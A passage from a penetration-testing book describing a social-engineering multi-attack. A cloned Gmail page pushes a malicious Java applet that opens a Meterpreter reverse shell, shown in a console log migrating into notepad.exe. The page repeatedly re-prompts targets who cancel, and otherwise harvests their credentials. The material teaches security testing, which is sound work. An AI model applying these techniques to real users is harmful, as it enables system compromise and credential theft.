156
Chapter 10
Figure 10-6: Multi-attack security warning
We have a backup attack, however. The target clicks Run on the mali-
cious Java applet, a Meterpreter shell begins, and the target is redirected
back to the original Gmail page. The attack is successful.
Notice that when using the Java applet, we automatically migrate to a sep-
arate thread (process) that happens to be
notepad.exe
. Because of this, if the
target closes the browser, our attack will continue because the process won’t
terminate our Meterpreter shell. Also, within the configuration file you can
set the “Java Repeater” option, which will continue to prompt the target
with the Java applet warning even if he clicks Cancel. This makes it more
likely that the target will click the Run button.
The Meterpreter shell is presented to us once a successful exploit is per-
formed, as shown below.
[*] Sending stage (748544 bytes) to 172.16.32.131
[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1333) at
Thu Sep 09 12:33:20 -0400 2010
[*] Session ID 1 (172.16.32.129:443 -> 172.16.32.131:1333) processing
InitialAutoRunScript 'migrate -f'
[*] Current server process: java.exe (824)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 3044
[*] New server process: notepad.exe (3044)
msf exploit(ms09_002_memory_corruption) >
Now let’s say that this attack fails, and the target clicks Cancel (without
the repeater option enabled). He would then be prompted to enter his user-
name and password into the username and password fields, allowing you to
successfully harvest the credentials on the website and still have a successful